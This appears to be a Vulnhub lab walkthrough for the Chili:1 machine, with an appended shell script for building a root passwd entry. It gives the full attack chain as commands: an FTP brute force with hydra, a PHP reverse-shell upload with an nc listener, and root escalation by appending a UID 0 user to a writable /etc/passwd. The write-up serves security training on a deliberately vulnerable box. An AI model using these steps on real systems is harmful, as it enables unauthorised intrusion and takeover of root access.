Chili:1 [Vulnhub] detailed walkthrough
Hi Hackers,
This is my first write-up, so please forgive any mistakes.
In this post we will exploit the machine Chili:1, posted by @SunCSR Team.
It is a great box with a slightly unusual way of getting a foothold. I would rate it easy to medium, but well worth hacking :D
Here is a brief outline of how this goes:
- nmap scanning
- FTP brute force
- finding a writable directory and getting a shell
- privesc using a writable /etc/passwd file
First, set up the machine in VMware and find its IP address using netdiscover or arp-scan -l.
Now the nmap scan. My favourite command for that is
nmap -A -sV -sC -vv $IP
(-A already implies -sV and -sC, so those two flags are redundant, but harmless.)
We find ports 21 (FTP) and 80 (HTTP) open.
The first thing I do is check for anonymous FTP login, but that is not successful. Then I move on to web enumeration: I browsed the website manually and found nothing except an image of a chili, so I ran gobuster to enumerate directories:
gobuster dir -u http://$IP:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,bak,conf -t 200
That found nothing, so I started thinking about steganography. I downloaded the image shown on index.html
and tried tools like exiftool, steghide, stegoveritas and binwalk.
Still nothing, so I went back to the machine's description, where the author left a hint: “If you ever get stuck, try again with the name of the lab”
So the name chili could be an FTP username. Time to call on my old friend hydra:
hydra -l chili -P /usr/share/wordlists/rockyou.txt -t 64 ftp://$IP
(On Kali the wordlist lives under /usr/share/wordlists; if it is still rockyou.txt.gz, decompress it first.)
Huuh! Now I have something to proceed with. I logged in to FTP with the credentials and saw that the whole filesystem is exposed over FTP. I looked for flags or other interesting files but found nothing, then browsed to /var/www/html, where I found a writable directory, .nano, into which I can upload a reverse shell.
I went to pentestmonkey and downloaded their PHP reverse shell,
changed the IP in it to my attacking machine's address (and the port to the one I will listen on), and uploaded it through FTP:
put /root/Document/shell.php /var/www/html/.nano/shell.php
Now start a listener on your local machine with nc -lnvp 1234
and browse to shell.php. I got an Internal Server Error (500). After a while I realised the problem was the permissions on the uploaded file: a PHP file does not need the execute bit, but the web server must be able to read it. I went back to FTP and loosened the permissions:
chmod 777 shell.php
(A less permissive mode such as 644 is normally enough for a PHP file served by Apache; 777 is just the quick fix on a lab box.)
Browsing to it again gives me my initial foothold on the machine. My first step is to upgrade the shell to a TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
There is no user flag; you have to escalate privileges to get the only flag, which is in the root directory.
For that I copied linPEAS to the machine, ran it, and found that
/etc/passwd is writable.
WoW, a piece of cake for privesc.
Perl is available on the machine, so we can use it to generate a password hash:
perl -le 'print crypt("password", "salt")'
This prints a crypt(3) hash of the password (traditional DES crypt, which only uses the first 8 characters of the password and a 2-character salt).
Then echo a new user with that hash into /etc/passwd. The hash goes in the second field, where a normal entry has an x, and UID 0 / GID 0 make the account root no matter what it is called:
echo "fuds:Encrypted_password:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
Now simply switch to root with su fuds, enter the password you chose, go to /root and cat proof.txt for the flag.
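The privesc above, packaged as an added shell example (my own code, not from the post or the box): it generates the hash the same way the post does, builds the passwd line, and runs the checks I would want before appending anything. It assumes perl is present on the target, as in the post; the username fuds, the gecos text added-root and the default salt sa are my choices. Nothing here writes to /etc/passwd; the line is printed so you can append it yourself.

```shell
#!/bin/sh
# Added example, not from the original write-up: build and sanity-check a
# root-equivalent /etc/passwd entry. Assumes perl on the target (as in the post).

# Traditional DES crypt(3) hash, exactly what the post's perl one-liner produces.
# DES crypt only uses the first 8 characters of the password and a 2-char salt.
make_des_hash() {
    # $1 = plaintext password, $2 = two-character salt
    perl -le 'print crypt($ARGV[0], $ARGV[1])' -- "$1" "$2"
}

# Assemble the passwd line: name:hash:uid:gid:gecos:home:shell.
# UID 0 and GID 0 are what make the account root; the name is cosmetic.
make_passwd_entry() {
    # $1 = username, $2 = crypt hash
    printf '%s:%s:0:0:added-root:/root:/bin/bash\n' "$1" "$2"
}

# The entry must have exactly 7 colon-separated fields and a real hash in
# field 2: an empty hash or the placeholder "x" would send login to /etc/shadow,
# and a stray ':' inside the hash would shift every field after it.
validate_entry() {
    entry=$1
    fields=$(printf '%s' "$entry" | awk -F: '{print NF}')
    hash=$(printf '%s' "$entry" | cut -d: -f2)
    [ "$fields" -eq 7 ] && [ -n "$hash" ] && [ "$hash" != "x" ]
}

# Preconditions on the target: the file is writable by us (the linPEAS finding)
# and the username is not already taken (a duplicate name confuses su/login).
can_add_user() {
    # $1 = username, $2 = passwd file (defaults to /etc/passwd)
    file=${2:-/etc/passwd}
    [ -w "$file" ] && ! grep -q "^$1:" "$file"
}

# Print the line the post's "echo ... >> /etc/passwd" would append, after the checks.
main() {
    user=${1:-fuds} pass=${2:-password} salt=${3:-sa}
    hash=$(make_des_hash "$pass" "$salt")
    entry=$(make_passwd_entry "$user" "$hash")
    validate_entry "$entry" || { echo "bad entry: $entry" >&2; return 1; }
    if can_add_user "$user"; then
        echo "/etc/passwd is writable: append the line below, then run: su $user"
    else
        echo "/etc/passwd is not writable (or $user already exists); entry shown for reference"
    fi
    printf '%s\n' "$entry"
}

# Usage: sh privesc_entry.sh fuds password sa
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Because DES crypt truncates at 8 characters, pick a short password or, where openssl is available on the target, generate an MD5-crypt hash with openssl passwd -1 instead; the rest of the entry is unchanged.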
Thanks for reading.
Thanks to @SunCSR Team for creating this awesome box.
References: https://hacknpentest.com/linux-privilege-escalation-via-writeable-etc-passwd-file/